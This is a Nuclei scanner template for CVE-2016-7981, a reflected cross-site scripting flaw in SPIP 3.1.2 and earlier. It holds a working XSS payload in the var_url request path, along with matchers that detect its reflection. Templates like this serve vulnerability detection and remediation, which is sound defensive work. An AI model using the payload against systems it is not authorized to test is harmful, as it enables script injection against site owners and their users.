nuclei-templates/http/cves/2016/CVE-2016-7981.yaml

53 lines
1.9 KiB
YAML
Raw Normal View History

2021-07-27 10:27:42 +00:00
id: CVE-2016-7981
info:
name: SPIP <3.1.2 - Cross-Site Scripting
2021-07-27 10:27:42 +00:00
author: pikpikcu
severity: medium
description: |
SPIP 3.1.2 and earlier contains a cross-site scripting vulnerability in valider_xml.php which allows remote attackers to inject arbitrary web script or HTML via the var_url parameter in a valider_xml action.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser.
2023-09-06 13:22:34 +00:00
remediation: |
Upgrade SPIP to version 3.1.2 or later to mitigate this vulnerability.
reference:
- https://core.spip.net/projects/spip/repository/revisions/23202
- https://core.spip.net/projects/spip/repository/revisions/23201
- https://core.spip.net/projects/spip/repository/revisions/23200
- https://nvd.nist.gov/vuln/detail/CVE-2016-7981
2023-07-11 19:49:27 +00:00
- http://www.openwall.com/lists/oss-security/2016/10/05/17
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-7981
cwe-id: CWE-79
2023-07-11 19:49:27 +00:00
epss-score: 0.00258
epss-percentile: 0.63336
2023-09-06 13:22:34 +00:00
cpe: cpe:2.3:a:spip:spip:*:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: spip
product: spip
tags: cve,cve2016,xss,spip
2021-07-27 10:27:42 +00:00
http:
2021-07-27 10:27:42 +00:00
- method: GET
path:
2021-07-27 11:53:32 +00:00
- "{{BaseURL}}/ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2021-07-27 10:27:42 +00:00
matchers-condition: and
matchers:
- type: word
2023-07-11 19:49:27 +00:00
part: body
2021-07-27 10:27:42 +00:00
words:
2021-07-27 11:53:32 +00:00
- '"></script><script>alert(document.domain)</script>'
2021-07-27 10:27:42 +00:00
- type: word
part: header
words:
- text/html
2023-07-11 19:49:27 +00:00
- type: status
status:
- 200
# digest: 4a0a00473045022100d33738c81f1b35258fc637b24d6b1bdde8405e4043aa5f90f2aafe19beffc7a0022037aed155ff8de44d6e23cb7cca576979a3acdc7b51568a5baafc32889aadff60:922c64590222798bb761d5b6d8e72950